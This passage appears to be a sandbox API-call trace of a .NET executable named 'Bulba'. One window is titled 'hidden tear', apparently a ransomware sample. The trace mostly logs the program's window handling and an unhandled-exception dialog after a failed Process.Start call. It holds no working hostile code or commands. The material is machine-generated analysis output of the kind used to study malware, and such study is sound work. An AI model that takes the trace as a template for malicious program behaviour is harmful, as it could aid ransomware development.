returned 0x3 [0058.098] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e8, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0058.098] GetWindow (hWnd=0x201e8, uCmd=0x3) returned 0x201e6 [0058.098] GetClientRect (in: hWnd=0x201e8, lpRect=0x3ada18 | out: lpRect=0x3ada18) returned 1 [0058.098] GetWindowRect (in: hWnd=0x201e8, lpRect=0x3ada18 | out: lpRect=0x3ada18) returned 1 [0058.098] GetParent (hWnd=0x201e8) returned 0x201ca [0058.098] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x201ca, lpPoints=0x3ada18, cPoints=0x2 | out: lpPoints=0x3ada18) returned -24707573 [0058.098] SetWindowTextW (hWnd=0x201e8, lpString="&Quit") returned 1 [0058.098] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e8, Msg=0xc, wParam=0x0, lParam=0x2453760) returned 0x1 [0058.098] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e8, Msg=0x5, wParam=0x0, lParam=0x170064) returned 0x0 [0058.098] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e8, Msg=0x3, wParam=0x0, lParam=0x5e014a) returned 0x0 [0058.098] GetClientRect (in: hWnd=0x201e8, lpRect=0x3ada70 | out: lpRect=0x3ada70) returned 1 [0058.098] GetWindowRect (in: hWnd=0x201e8, lpRect=0x3ada70 | out: lpRect=0x3ada70) returned 1 [0058.098] GetParent (hWnd=0x201e8) returned 0x201ca [0058.099] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x201ca, lpPoints=0x3ada70, cPoints=0x2 | out: lpPoints=0x3ada70) returned -24707573 [0058.099] SendMessageW (hWnd=0x201e8, Msg=0x2210, wParam=0x1e80001, lParam=0x201e8) returned 0x0 [0058.099] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e8, Msg=0x2210, wParam=0x1e80001, lParam=0x201e8) returned 0x0 [0058.099] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e8, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0058.099] GetParent (hWnd=0x201e8) returned 0x201ca [0058.099] GetCurrentActCtx (in: lphActCtx=0x3ae240 | out: lphActCtx=0x3ae240*=0x416cac) returned 1 [0058.099] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0058.099] GetClassInfoW (in: hInstance=0x0, lpClassName="EDIT", lpWndClass=0x2455e94 | out: lpWndClass=0x2455e94) returned 1 [0058.099] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0058.100] CoTaskMemAlloc (cb=0x54) returned 0x6b44640 [0058.100] RegisterClassW (lpWndClass=0x3ae0f8) returned 0xc141 [0058.100] CoTaskMemFree (pv=0x6b44640) [0058.100] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0058.100] CreateWindowExW (dwExStyle=0x200, lpClassName="WindowsForms10.EDIT.app.0.141b42a_r14_ad1", lpWindowName="See the end of this message for details on invoking \r\njust-in-time (JIT) debugging instead of this dialog box.\r\n\r\n************** Exception Text **************\r\nSystem.ComponentModel.Win32Exception (0x80004005): The system cannot find the file specified\r\n at System.Diagnostics.Process.StartWithShellExecuteEx(ProcessStartInfo startInfo)\r\n at System.Diagnostics.Process.Start()\r\n at System.Diagnostics.Process.Start(ProcessStartInfo startInfo)\r\n at System.Diagnostics.Process.Start(String fileName)\r\n at Bulba.Form1.startAction()\r\n at Bulba.Form1.Form1_Load(Object sender, EventArgs e)\r\n at System.Windows.Forms.Form.OnLoad(EventArgs e)\r\n at System.Windows.Forms.Form.OnCreateControl()\r\n at System.Windows.Forms.Control.CreateControl(Boolean fIgnoreVisible)\r\n at System.Windows.Forms.Control.CreateControl()\r\n at System.Windows.Forms.Control.WmShowWindow(Message& m)\r\n at System.Windows.Forms.Control.WndProc(Message& m)\r\n at System.Windows.Forms.ScrollableControl.WndProc(Message& m)\r\n at System.Windows.Forms.Form.WmShowWindow(Message& m)\r\n at System.Windows.Forms.Form.WndProc(Message& m)\r\n at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)\r\n at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)\r\n at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)\r\n\r\n\r\n************** Loaded Assemblies **************\r\nmscorlib\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.NET/Framework/v4.0.30319/mscorlib.dll\r\n----------------------------------------\r\nBulba\r\n Assembly Version: 1.0.0.0\r\n Win32 Version: n/a\r\n CodeBase: file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/local.exe\r\n----------------------------------------\r\nSystem.Windows.Forms\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Windows.Forms/v4.0_4.0.0.0__b77a5c561934e089/System.Windows.Forms.dll\r\n----------------------------------------\r\nSystem\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System/v4.0_4.0.0.0__b77a5c561934e089/System.dll\r\n----------------------------------------\r\nSystem.Drawing\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Drawing/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.Drawing.dll\r\n----------------------------------------\r\nSystem.Core\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Core/v4.0_4.0.0.0__b77a5c561934e089/System.Core.dll\r\n----------------------------------------\r\nSystem.Configuration\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Configuration/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.Configuration.dll\r\n----------------------------------------\r\nSystem.Xml\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Xml/v4.0_4.0.0.0__b77a5c561934e089/System.Xml.dll\r\n----------------------------------------\r\n\r\n************** JIT Debugging **************\r\nTo enable just-in-time (JIT) debugging, the .config file for this\r\napplication or computer (machine.config) must have the\r\njitDebugging value set in the system.windows.forms section.\r\nThe application must also be compiled with debugging\r\nenabled.\r\n\r\nFor example:\r\n\r\n\r\n \r\n\r\n\r\nWhen JIT debugging is enabled, any unhandled exception\r\nwill be sent to the JIT debugger registered on the computer\r\nrather than be handled by this dialog box.\r\n\r\n\r\n", dwStyle=0x563008c4, X=8, Y=125, nWidth=422, nHeight=154, hWndParent=0x201ca, hMenu=0x0, hInstance=0xf70000, lpParam=0x0) returned 0x201e2 [0058.100] SetWindowLongW (hWnd=0x201e2, nIndex=-4, dwNewLong=1942854096) returned 5355510 [0058.100] GetWindowLongW (hWnd=0x201e2, nIndex=-4) returned 1942854096 [0058.100] SetWindowLongW (hWnd=0x201e2, nIndex=-4, dwNewLong=5355550) returned 1942854096 [0058.100] GetWindowLongW (hWnd=0x201e2, nIndex=-4) returned 5355550 [0058.101] GetWindowLongW (hWnd=0x201e2, nIndex=-16) returned 1177553092 [0058.101] GetWindowLongW (hWnd=0x201e2, nIndex=-12) returned 0 [0058.101] SetWindowLongW (hWnd=0x201e2, nIndex=-12, dwNewLong=131554) returned 0 [0058.101] CallWindowProcW (lpPrevWndFunc=0x73cd99d0, hWnd=0x201e2, Msg=0x81, wParam=0x0, lParam=0x3adcd4) returned 0x1 [0058.104] CallWindowProcW (lpPrevWndFunc=0x73cd99d0, hWnd=0x201e2, Msg=0x83, wParam=0x0, lParam=0x3adcc0) returned 0x0 [0058.105] CallWindowProcW (lpPrevWndFunc=0x73cd99d0, hWnd=0x201e2, Msg=0x1, wParam=0x0, lParam=0x3adcd4) returned 0x1 [0058.136] GetWindow (hWnd=0x201e2, uCmd=0x3) returned 0x201e8 [0058.136] GetClientRect (in: hWnd=0x201e2, lpRect=0x3ada14 | out: lpRect=0x3ada14) returned 1 [0058.136] GetWindowRect (in: hWnd=0x201e2, lpRect=0x3ada14 | out: lpRect=0x3ada14) returned 1 [0058.136] GetParent (hWnd=0x201e2) returned 0x201ca [0058.136] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x201ca, lpPoints=0x3ada14, cPoints=0x2 | out: lpPoints=0x3ada14) returned -24707573 [0058.136] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.136] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.136] GetSystemMetrics (nIndex=42) returned 0 [0058.136] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3ad894, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.136] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3ad894) returned 0x18 [0058.136] SendMessageW (hWnd=0x201e2, Msg=0x30, wParam=0x180a025c, lParam=0x0) returned 0x1 [0058.136] CallWindowProcW (lpPrevWndFunc=0x73cd99d0, hWnd=0x201e2, Msg=0x30, wParam=0x180a025c, lParam=0x0) returned 0x1 [0058.150] SetWindowTextW (hWnd=0x201e2, lpString="See the end of this message for details on invoking \r\njust-in-time (JIT) debugging instead of this dialog box.\r\n\r\n************** Exception Text **************\r\nSystem.ComponentModel.Win32Exception (0x80004005): The system cannot find the file specified\r\n at System.Diagnostics.Process.StartWithShellExecuteEx(ProcessStartInfo startInfo)\r\n at System.Diagnostics.Process.Start()\r\n at System.Diagnostics.Process.Start(ProcessStartInfo startInfo)\r\n at System.Diagnostics.Process.Start(String fileName)\r\n at Bulba.Form1.startAction()\r\n at Bulba.Form1.Form1_Load(Object sender, EventArgs e)\r\n at System.Windows.Forms.Form.OnLoad(EventArgs e)\r\n at System.Windows.Forms.Form.OnCreateControl()\r\n at System.Windows.Forms.Control.CreateControl(Boolean fIgnoreVisible)\r\n at System.Windows.Forms.Control.CreateControl()\r\n at System.Windows.Forms.Control.WmShowWindow(Message& m)\r\n at System.Windows.Forms.Control.WndProc(Message& m)\r\n at System.Windows.Forms.ScrollableControl.WndProc(Message& m)\r\n at System.Windows.Forms.Form.WmShowWindow(Message& m)\r\n at System.Windows.Forms.Form.WndProc(Message& m)\r\n at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)\r\n at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)\r\n at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)\r\n\r\n\r\n************** Loaded Assemblies **************\r\nmscorlib\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.NET/Framework/v4.0.30319/mscorlib.dll\r\n----------------------------------------\r\nBulba\r\n Assembly Version: 1.0.0.0\r\n Win32 Version: n/a\r\n CodeBase: file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/local.exe\r\n----------------------------------------\r\nSystem.Windows.Forms\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Windows.Forms/v4.0_4.0.0.0__b77a5c561934e089/System.Windows.Forms.dll\r\n----------------------------------------\r\nSystem\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System/v4.0_4.0.0.0__b77a5c561934e089/System.dll\r\n----------------------------------------\r\nSystem.Drawing\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Drawing/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.Drawing.dll\r\n----------------------------------------\r\nSystem.Core\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Core/v4.0_4.0.0.0__b77a5c561934e089/System.Core.dll\r\n----------------------------------------\r\nSystem.Configuration\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Configuration/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.Configuration.dll\r\n----------------------------------------\r\nSystem.Xml\r\n Assembly Version: 4.0.0.0\r\n Win32 Version: 4.6.81.0 built by: NETFXREL2\r\n CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Xml/v4.0_4.0.0.0__b77a5c561934e089/System.Xml.dll\r\n----------------------------------------\r\n\r\n************** JIT Debugging **************\r\nTo enable just-in-time (JIT) debugging, the .config file for this\r\napplication or computer (machine.config) must have the\r\njitDebugging value set in the system.windows.forms section.\r\nThe application must also be compiled with debugging\r\nenabled.\r\n\r\nFor example:\r\n\r\n\r\n \r\n\r\n\r\nWhen JIT debugging is enabled, any unhandled exception\r\nwill be sent to the JIT debugger registered on the computer\r\nrather than be handled by this dialog box.\r\n\r\n\r\n") returned 1 [0058.150] CallWindowProcW (lpPrevWndFunc=0x73cd99d0, hWnd=0x201e2, Msg=0xc, wParam=0x0, lParam=0x24504cc) returned 0x1 [0058.151] GetSystemMetrics (nIndex=5) returned 1 [0058.151] GetSystemMetrics (nIndex=6) returned 1 [0058.151] SendMessageW (hWnd=0x201e2, Msg=0xc5, wParam=0x7fff, lParam=0x0) returned 0x1 [0058.151] CallWindowProcW (lpPrevWndFunc=0x73cd99d0, hWnd=0x201e2, Msg=0xc5, wParam=0x7fff, lParam=0x0) returned 0x1 [0058.152] CallWindowProcW (lpPrevWndFunc=0x73cd99d0, hWnd=0x201e2, Msg=0x5, wParam=0x0, lParam=0x850191) returned 0x1 [0058.152] CallWindowProcW (lpPrevWndFunc=0x73cd99d0, hWnd=0x201e2, Msg=0x3, wParam=0x0, lParam=0x7f000a) returned 0x0 [0058.152] GetClientRect (in: hWnd=0x201e2, lpRect=0x3ada6c | out: lpRect=0x3ada6c) returned 1 [0058.152] GetWindowRect (in: hWnd=0x201e2, lpRect=0x3ada6c | out: lpRect=0x3ada6c) returned 1 [0058.152] GetParent (hWnd=0x201e2) returned 0x201ca [0058.152] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x201ca, lpPoints=0x3ada6c, cPoints=0x2 | out: lpPoints=0x3ada6c) returned -24707573 [0058.152] SendMessageW (hWnd=0x201e2, Msg=0x2210, wParam=0x1e20001, lParam=0x201e2) returned 0x0 [0058.152] CallWindowProcW (lpPrevWndFunc=0x73cd99d0, hWnd=0x201e2, Msg=0x2210, wParam=0x1e20001, lParam=0x201e2) returned 0x0 [0058.153] CallWindowProcW (lpPrevWndFunc=0x73cd99d0, hWnd=0x201e2, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0058.153] GetParent (hWnd=0x201e2) returned 0x201ca [0058.153] GetWindowLongW (hWnd=0x201ca, nIndex=-8) returned 0 [0058.153] GetCursorPos (in: lpPoint=0x2456300 | out: lpPoint=0x2456300*(x=166, y=29)) returned 1 [0058.153] MonitorFromPoint (pt=0x19a, dwFlags=0x2cd) returned 0x10001 [0058.153] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x3ae174 | out: lpmi=0x3ae174) returned 1 [0058.153] CreateDCW (pwszDriver="\\\\.\\DISPLAY1", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0xae01082a [0058.154] GetDeviceCaps (hdc=0xae01082a, index=12) returned 32 [0058.154] GetDeviceCaps (hdc=0xae01082a, index=14) returned 1 [0058.154] DeleteDC (hdc=0xae01082a) returned 1 [0058.154] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x3ae1c8 | out: lpmi=0x3ae1c8) returned 1 [0058.154] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x3ae278 | out: lpdwProcessId=0x3ae278) returned 0x974 [0058.154] GetCurrentThreadId () returned 0x974 [0058.154] RegisterClipboardFormatW (lpszFormat="WindowsForms12_ThreadCallbackMessage") returned 0xc142 [0058.155] PostMessageW (hWnd=0x201ca, Msg=0xc142, wParam=0x0, lParam=0x0) returned 1 [0058.155] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.155] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.155] GetSystemMetrics (nIndex=42) returned 0 [0058.155] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3ae1d0, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.155] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3ae1d0) returned 0x18 [0058.155] GdipImageGetFrameDimensionsCount (image=0x4efc400, count=0x3ae1dc) returned 0x0 [0058.155] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x6b60698 [0058.156] GdipImageGetFrameDimensionsList (image=0x4efc400, dimensionIDs=0x6b60698*(Data1=0x6e0071, Data2=0x6b, Data3=0x6e, Data4=([0]=0x6f, [1]=0x0, [2]=0x77, [3]=0x0, [4]=0x6e, [5]=0x0, [6]=0x0, [7]=0x0)), count=0x1) returned 0x0 [0058.157] LocalFree (hMem=0x6b60698) returned 0x0 [0058.159] GdipImageGetFrameDimensionsCount (image=0x4efaca8, count=0x3ae1d0) returned 0x0 [0058.159] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x6b606c8 [0058.159] GdipImageGetFrameDimensionsList (image=0x4efaca8, dimensionIDs=0x6b606c8*(Data1=0xfe000077, Data2=0xedc7, Data3=0xaaa2, Data4=([0]=0xb5, [1]=0xdf, [2]=0x99, [3]=0x7e, [4]=0xb4, [5]=0xb9, [6]=0xb9, [7]=0x80)), count=0x1) returned 0x0 [0058.159] LocalFree (hMem=0x6b606c8) returned 0x0 [0058.159] SystemParametersInfoW (in: uiAction=0x5f, uiParam=0x0, pvParam=0x3ae310, fWinIni=0x0 | out: pvParam=0x3ae310) returned 1 [0058.160] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x46, wParam=0x0, lParam=0x3ae60c) returned 0x0 [0058.169] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0058.169] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0058.169] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0058.169] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0058.170] GetWindowPlacement (in: hWnd=0x201ca, lpwndpl=0x3ae3d4 | out: lpwndpl=0x3ae3d4) returned 1 [0058.170] GetClientRect (in: hWnd=0x201ca, lpRect=0x3ae380 | out: lpRect=0x3ae380) returned 1 [0058.170] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.170] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.171] GetSystemMetrics (nIndex=42) returned 0 [0058.171] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3ae224, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.171] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3ae224) returned 0x18 [0058.171] GetClientRect (in: hWnd=0x201ca, lpRect=0x3ae288 | out: lpRect=0x3ae288) returned 1 [0058.171] GetCurrentObject (hdc=0x101084f, type=0x1) returned 0x1b00017 [0058.171] GetCurrentObject (hdc=0x101084f, type=0x2) returned 0x1900010 [0058.171] GetCurrentObject (hdc=0x101084f, type=0x7) returned 0x1050032 [0058.171] GetCurrentObject (hdc=0x101084f, type=0x6) returned 0x18a002e [0058.171] SaveDC (hdc=0x101084f) returned 1 [0058.171] GetNearestColor (hdc=0x101084f, color=0xf0f0f0) returned 0xf0f0f0 [0058.171] CreateSolidBrush (color=0xf0f0f0) returned 0x18100257 [0058.171] FillRect (hDC=0x101084f, lprc=0x3ae128, hbr=0x18100257) returned 1 [0058.171] DeleteObject (ho=0x18100257) returned 1 [0058.171] RestoreDC (hdc=0x101084f, nSavedDC=-1) returned 1 [0058.171] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f2, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0058.172] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0058.172] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0058.172] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0x14, wParam=0x101084f, lParam=0x0) returned 0x1 [0058.173] GetStockObject (i=5) returned 0x1900015 [0058.174] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0058.174] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x14, wParam=0x1501025e, lParam=0x0) returned 0x1 [0058.174] GetStockObject (i=5) returned 0x1900015 [0058.174] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e8, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0058.174] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e8, Msg=0x14, wParam=0x4010840, lParam=0x0) returned 0x1 [0058.174] GetStockObject (i=5) returned 0x1900015 [0058.174] GetWindowPlacement (in: hWnd=0x301c4, lpwndpl=0x3ae3d4 | out: lpwndpl=0x3ae3d4) returned 1 [0058.174] GetClientRect (in: hWnd=0x301c4, lpRect=0x3ae380 | out: lpRect=0x3ae380) returned 1 [0058.174] GetWindowTextLengthW (hWnd=0x301c4) returned 11 [0058.174] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0058.174] GetSystemMetrics (nIndex=42) returned 0 [0058.174] GetWindowTextW (in: hWnd=0x301c4, lpString=0x3ae240, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0058.174] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xd, wParam=0xc, lParam=0x3ae240) returned 0xb [0058.175] GetClientRect (in: hWnd=0x301c4, lpRect=0x3ae288 | out: lpRect=0x3ae288) returned 1 [0058.175] GetCurrentObject (hdc=0x1501025e, type=0x1) returned 0x1b00017 [0058.175] GetCurrentObject (hdc=0x1501025e, type=0x2) returned 0x1900010 [0058.175] GetCurrentObject (hdc=0x1501025e, type=0x7) returned 0x5d0501da [0058.175] GetCurrentObject (hdc=0x1501025e, type=0x6) returned 0x18a002e [0058.175] SaveDC (hdc=0x1501025e) returned 1 [0058.175] GetNearestColor (hdc=0x1501025e, color=0xf0f0f0) returned 0xf0f0f0 [0058.175] CreateSolidBrush (color=0xf0f0f0) returned 0x19100257 [0058.175] FillRect (hDC=0x1501025e, lprc=0x3ae128, hbr=0x19100257) returned 1 [0058.175] DeleteObject (ho=0x19100257) returned 1 [0058.175] RestoreDC (hdc=0x1501025e, nSavedDC=-1) returned 1 [0058.180] GetWindowPlacement (in: hWnd=0x201ca, lpwndpl=0x3ae3bc | out: lpwndpl=0x3ae3bc) returned 1 [0058.180] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x47, wParam=0x0, lParam=0x3ae60c) returned 0x0 [0058.180] GetClientRect (in: hWnd=0x201ca, lpRect=0x3ae36c | out: lpRect=0x3ae36c) returned 1 [0058.180] GetWindowRect (in: hWnd=0x201ca, lpRect=0x3ae36c | out: lpRect=0x3ae36c) returned 1 [0058.180] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0058.180] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0058.180] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0058.180] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x5, wParam=0x0, lParam=0x7d01b6) returned 0x0 [0058.180] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x3, wParam=0x0, lParam=0x17a01f5) returned 0x0 [0058.180] GetClientRect (in: hWnd=0x201ca, lpRect=0x3ae398 | out: lpRect=0x3ae398) returned 1 [0058.180] GetWindowRect (in: hWnd=0x201ca, lpRect=0x3ae398 | out: lpRect=0x3ae398) returned 1 [0058.181] InvalidateRect (hWnd=0x201e6, lpRect=0x0, bErase=0) returned 1 [0058.181] InvalidateRect (hWnd=0x201f4, lpRect=0x0, bErase=0) returned 1 [0058.181] GetFocus () returned 0x201ca [0058.181] GetFocus () returned 0x201ca [0058.181] SetFocus (hWnd=0x201f4) returned 0x201ca [0058.181] GetFocus () returned 0x201f4 [0058.181] IsChild (hWndParent=0x201ca, hWnd=0x201f4) returned 1 [0058.181] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x8, wParam=0x201f4, lParam=0x0) returned 0x0 [0058.181] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0 [0058.181] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0058.182] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0058.182] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0x7, wParam=0x201ca, lParam=0x0) returned 0x0 [0058.189] GetStockObject (i=5) returned 0x1900015 [0058.189] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x8 [0058.189] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0xd, wParam=0x9, lParam=0x6b2c280) returned 0x8 [0058.189] GetDlgItem (hDlg=0x201ca, nIDDlgItem=131572) returned 0x201f4 [0058.189] SendMessageW (hWnd=0x201f4, Msg=0x202b, wParam=0x201f4, lParam=0x3ae0e8) returned 0x0 [0058.189] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0x202b, wParam=0x201f4, lParam=0x3ae0e8) returned 0x0 [0058.189] InvalidateRect (hWnd=0x201f4, lpRect=0x0, bErase=0) returned 1 [0058.189] GetFocus () returned 0x201f4 [0058.190] PeekMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.190] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0058.190] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0058.190] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0058.190] IsWindowUnicode (hWnd=0x201ca) returned 1 [0058.191] GetMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.193] TranslateMessage (lpMsg=0x3ae6fc) returned 0 [0058.193] DispatchMessageW (lpMsg=0x3ae6fc) returned 0x0 [0058.193] PeekMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.193] GetMessageA (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.193] TranslateMessage (lpMsg=0x3ae6fc) returned 0 [0058.193] DispatchMessageA (lpMsg=0x3ae6fc) returned 0x0 [0058.193] PeekMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.194] 